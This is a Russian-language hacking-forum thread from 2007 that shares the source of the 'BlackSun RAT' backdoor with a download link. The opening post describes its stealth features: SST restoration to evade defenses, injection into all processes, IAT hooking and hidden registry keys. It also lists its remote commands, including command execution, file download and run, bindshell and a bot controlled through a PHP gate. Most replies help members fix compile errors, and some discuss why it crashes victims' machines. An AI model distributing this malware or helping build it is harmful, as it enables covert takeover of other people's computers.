Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Защита ОС: вирусы, антивирусы, файрволы. (https://forum.antichat.xyz/forumdisplay.php?f=80)
-   -   BlackSun RAT v1.0 by Cytech (https://forum.antichat.xyz/showthread.php?t=41973)

ShadOS 11.06.2007 02:00
BlackSun RAT v1.0 by Cytech
 
поздновато выкладываю, но всё же дабы было достоянием общественности:
Цитата:
BlackSun RAT v1.0 prebeta by Cytech
- продвинутая система удаленного администратирования. При запуске прописывается в автозагрузку и восстанавливает таблицу системных сервисов (SST) для обхода проактивных защит контролирующих process-injection. Затем инжектирует себя во все процессы и перехывает в них некоторые API-функции для сокрытия в системе методом модификации таблицы импорта (IAT-hooking). Работает в контексте заданного процесса (по дефолту explorer.exe). После чего слушает порт (по дефолту 2121) для подключений. Сервер поддерживает множество команд:
- Выполнение команд через cmd.exe
- Скрытый/видимый запуск через WinExec
- Скачка файла по HTTP-протоколу
- Закачка файла с компьютера на FTP-протокол
- Привзяка cmd.exe к заданному порту (bindshell)
- Управление питанием (выключить/перезагрузить/заснуть/встать)
- Самоуничтожение
- Завершение работы
- а также приблуды вроде открывания/закрывания CD-ROM, включения/выключения монитора и т.д. Встроен HTTP-бот, который отстукивает на статистику и получает команду на скачку и запуск заданного файла. Причем HTTP-бот работает полностью распределенно, то есть каждому боту можно выставить свою собственную команду.
Бэкдор управляется полностью через PHP-гейт. В итоге полностью невидимы файлы, ключи в реестре, процесс.
Подробнее внутри.

http://hellknights.void.ru/
http://hellknights.void.ru/releases/0x48k-blacksun-rcs-v10prebeta.rar

Alexsize 11.06.2007 10:09
Давно их смотрел. Очень познавательно и интересно, НО не компилиться. Ругаеться на недостаток H файла.

ShadOS 11.06.2007 20:44
Цитата:
Сообщение от Alexsize
Давно их смотрел. Очень познавательно и интересно, НО не компилиться. Ругаеться на недостаток H файла.
Какого именно хедера там не хватает? Если что я могу с Сайтексом сконтактировать, если сам не разберусь.

Alexsize 11.06.2007 21:08
Error 1 fatal error C1010: unexpected end of file while looking for precompiled header. Did you forget to add '#include "stdafx.h"' to your source?

ShadOS 11.06.2007 21:16
Цитата:
Сообщение от Alexsize
Error 1 fatal error C1010: unexpected end of file while looking for precompiled header. Did you forget to add '#include "stdafx.h"' to your source?
Скорее всего ты пытаешься собрать его в MSVC, что в корне неверно т.к. в readme автор совершенно чётко написал что собирать надо в компиляторе lcc. У меня собирается без проблем. lcc можно скачать здесь:
http://www.cs.virginia.edu/~lcc-win32/

Alexsize 11.06.2007 21:36
Окей. Спасибо. Я действительно собирал у мелкомягких.

Вот выдержка из ридми кстати:


Сначало необходимо поправить конфигурационные файлы: conf.h (бэкдор) и conf.php (гейт).
Затем компилируем (у меня Microsoft (R) 32-bit C/C++ Standard Compiler Version 12.00.8168)

ShadOS 12.06.2007 00:46
Цитата:
Сообщение от Alexsize
Окей. Спасибо. Я действительно собирал у мелкомягких.

Вот выдержка из ридми кстати:


Сначало необходимо поправить конфигурационные файлы: conf.h (бэкдор) и conf.php (гейт).
Затем компилируем (у меня Microsoft (R) 32-bit C/C++ Standard Compiler Version 12.00.8168)
OK, так тоже можно.

_Great_ 12.06.2007 22:13
Цитата:
Скорее всего ты пытаешься собрать его в Msvc, что в корне неверно
Особых различий в компиляторах нет. Разве что только какиенить заумные прагмы

_kREveDKo_ 12.06.2007 22:42
Йа компилел в DevC++, Mars Digital compiler, lcc.... везде ошибки... везде разные... =((
По линку с компилеру, что дал ShadOS линк на компилер не нашёл =\ только хелп и что-то ещё...

PAKOT 13.06.2007 08:41
Вот полный линк.
http://www.q-software-solutions.de/pub/lccwin32.exe

Zliden 14.06.2007 14:55
Цитата:
Сообщение от ShadOS
Скорее всего ты пытаешься собрать его в MSVC, что в корне неверно т.к. в readme автор совершенно чётко написал что собирать надо в компиляторе lcc. У меня собирается без проблем. lcc можно скачать здесь:
http://www.cs.virginia.edu/~lcc-win32/
Скачал я оттуда компилятор, не выходит все равно:(
а где найти тот, что автор юзал?
или подскажите как скомпилить норм.

razzzar 17.06.2007 01:30
пытался скомпилировать через cl.exe:

Код:
LIBC.lib(chkstk.obj) : error LNK2005: __chkstk already defined in ntdll.lib(ntdll.dll)
blacksun.exe : fatal error LNK1169: one or more multiply defined symbols found
кто может подсказать как это исправить?

razzzar 17.06.2007 01:32
2Zliden, компиль через cl.exe - это компилятор мелкомягких. Находится по адрессу: /path/to/Visual/Studio/Vc7/bin/cl.exe

ShadOS 18.06.2007 14:23
Цитата:
Сообщение от razzzar
пытался скомпилировать через cl.exe:

Код:
LIBC.lib(chkstk.obj) : error LNK2005: __chkstk already defined in ntdll.lib(ntdll.dll)
blacksun.exe : fatal error LNK1169: one or more multiply defined symbols found
кто может подсказать как это исправить?
Найди это объявление в исходниках RAT.

Cytech 26.06.2007 18:14
скоро будет новая версия... ) багфикс + новые фичи. ждите )
p.s: ShadOS покажи где я написал, что компилиить надо в lcc-win32? MSVC рулит... причем VC98 :D

Namelles One 17.07.2007 23:02
ShadOS
Враки всё. Не в исходниках РАТ, а действительно происходит перекрытие в ntdll.lib и libcd.lib

Причем происходит только при попытке прогнать пошагово через Студию в дебаг режиме. При простой компиляции при помощи cl.exe - все норм.

Раскрою страшную тайну, не бейте. ;)

Цитата:
#pragma comment(linker," /DISALLOWLIB:libcd.lib")
Вот это впишите вверху headers.h и всё скомпилится в любом варианте.
Радуйтесь все, кто до сих пор не смог это сделать.

Aves 24.07.2007 17:44
Ребят помогите при компиляции неможет найти NTstatus.h. пытался сам его найти но не в инете не в MSDN ни в стандартных его нет. Дайте его. Буду очень благодарен

ShadOS 24.07.2007 18:36
Цитата:
Сообщение от Aves
Ребят помогите при компиляции неможет найти NTstatus.h. пытался сам его найти но не в инете не в MSDN ни в стандартных его нет. Дайте его. Буду очень благодарен
смотри в DDK. Может ещё вот этот подойдёт:
http://www.cyboretum.com/tarballs/libfpx-1.2.0.9/oless/props/h/ntstatus.h
http://www.cs.colorado.edu/~main/cs1300/include/ddk/ntstatus.h

Aves 30.07.2007 19:12
Thanks
но есть проблема скомпилировал я BlackSun RAT v1.0 by Cytech но он не на всех машинах пашет иногда в 50% случаев выпадает в синий экран. толи из-за того что антивирь не дает паметь писат там где не надо толи из-за чего-нибудь еще. Но обидно хотелось 100% случаев работы.

да и почему для загрузки используется просто реестр. Очень легко отключить.

А кеогда будет новый релиз.
Так хочется....

Namelles One 01.08.2007 23:12
Aves
Скорее всего из-за того, что Cr4sh в паблик отдает невероятно сырые исходники уровня ring0. И при восстановление SST имеем BSOD.

Чтобы оно заработало как надо - там надо еще доводить и доводить, впрочем, я пока сам хз еще как... Ничего, знания доступны, времени - бесконечность. :)

drmist 02.08.2007 11:45
Интересный экземпляр, но как-то черезчур сложно.
Сначала инжект в ядро, из ядра в юзермод - зачем такие сложности и для чего так палиться?
Файло скачиваетя по HTTP, а закачивается по FTP - что мешало просто реализовать человеческий FTP?
В общем "нипоняяятно... (c)"

_PARAZIT_ 04.10.2007 16:06
что то он всеравно не компилицца
Код:
Linking...
blacksun.obj : warning LNK4098: defaultlib "libcd.lib" conflicts with use of other libs; use /NODEFAULTLIB:library
libcd.lib(crt0.obj) : error LNK2001: unresolved external symbol _main
Debug/blacksun.exe : fatal error LNK1120: 1 unresolved externals
Error executing link.exe.

blacksun.exe - 2 error(s), 1 warning(s)
#pragma comment(linker," /DISALLOWLIB:libcd.lib") - в headers.h добавил...
компилятор точно такой же как и у Cytech...
компилил через студию как проект...

groundhog 04.10.2007 16:09
Насколько я знаю, Cytch не компилит такие проекты в студии, он всё делает с консоли... :)

_PARAZIT_ 04.10.2007 17:07
я просто на С не учень проограмировать умею... поэтому незнаю как с кансоли скомпилить...
может напишешь примерчик как его компилить?

groundhog 04.10.2007 17:21
У тебя проблема в этом:
Цитата:
libcd.lib(crt0.obj) : error LNK2001: unresolved external symbol _main
Я насколько помню, Сай делал через точку входа WinMain, а ты пытаешься скомпилить как консольное приложение. Ты когда создавал проект выбрал неправильный тип проекта, выбери "Win32 Project" вместо "Console Project".

_PARAZIT_ 04.10.2007 18:17
и так и так не получается...главное выдает одно и то же...
надо как то с консольки попробовать...

_PARAZIT_ 05.10.2007 19:50
народ наверное у меня какойта карявый С++ (раньше просто писал на нем несложные програмы работы с файловай системой), не пашут функции с winsock...
подскажите где можна скачать точно такой же компилятор и среду расрабоки как у Cytech, у него вроде бы microsoft visual C++ 6.0 и компилятор Standard Compiler Version 12.00.8168

Ni0x 05.10.2007 20:10
Просто выпал.
Цитата:
я просто на С не учень проограмировать умею... поэтому незнаю как с кансоли скомпилить...
может напишешь примерчик как его компилить?
Прям в точку попал.
Для того чтобы скомпилировать что-то, нужно как минимум год программировать на С и столько же постигать восточную мудрость в горах Тибета. Так что даже не пробуй, всеравно опыта не хватит.
Цитата:
народ наверное у меня какойта карявый С++ (раньше просто писал на нем несложные програмы работы с файловай системой), не пашут функции с winsock...
подскажите где можна скачать точно такой же компилятор и среду расрабоки как у Cytech, у него вроде бы microsoft visual C++ 6.0 и компилятор Standard Compiler Version 12.00.8168
Однозначно! Во всем виноват этот ужасный язык. Видишь ли, дело скорее всего не в компиляторе, а в тебе.

_PARAZIT_ 05.10.2007 21:45
товарисч
Код:
#include <winsock2.h>
#include <windows.h>

int main(){ 

        SOCKET s;
    struct sockaddr_in localaddr, clientaddr;
        WSADATA wsaData;
        typedef struct {HANDLE hRead; HANDLE hWrite;} PIPE;
        PIPE input, output;
        SECURITY_ATTRIBUTES sa;
        STARTUPINFO st;
        PROCESS_INFORMATION pr;

    WSAStartup(MAKEWORD(2,2), &wsaData);
}
у меня даже это не собирается так что ж тут говарить?

Ni0x 05.10.2007 21:49
Товарисч, почитайте книжку на досуге, что уж тут говорить.

_PARAZIT_ 06.10.2007 00:21
ну книги у меня есть, и их читал...но причины так и не нашел - вкигах же не объясняется почему у меня что то не работает...просто если я не прав скажи в чем тут дело.......

groundhog 06.10.2007 00:34
Паразит, ну правда... Полазь по кодерским форумам, почитай что они пишут... Все вопросы, которые ты задаёшь в своей основе относятся к азам программирования... Тут тебе никто не станет рассказывать как настроить компилятор, какие ему передать параметры, как создать и настроить проект под определённое приложение... Просто это отнимет время и ничему тебя не научит - в одно ухо влетит, а в другое вылетит и Ниокс так и будет над тобой глумиться... А чтобы у тебя заработала сокетная библиотека нужно добавит в проект либу ws2_32.lib. Если бы ты смотрел исходники Сая, ты бы увидел это:

Цитата:
#pragma comment(lib, "ws2_32.lib")

lif3burn 26.10.2007 14:19
В файле functions.h 151 строка:

Код:
static DWORD WINAPI ExecuteCMD(char * command)  //151
        ...
        char cmdpath[256];        //160
        ...
        GetEnvironmentVariable(COMSPEC, cmdpath, 2048);  //186
Здесь вроде переполнение. Или это фича? ;)

ZaCo 27.10.2007 02:03
не думай, GetEnvironmentVariable для несуществующей переменной окружения ничего не запишет в буфер. поиск по GetEnvironmentVariable и crt-функции putenv результата не дал, стало быть если "сайтег" не захотел сделать специально уязвимую версию бота, в чем я сомневаюсь, можно этим строчкам кода доверять:)


Время: 10:30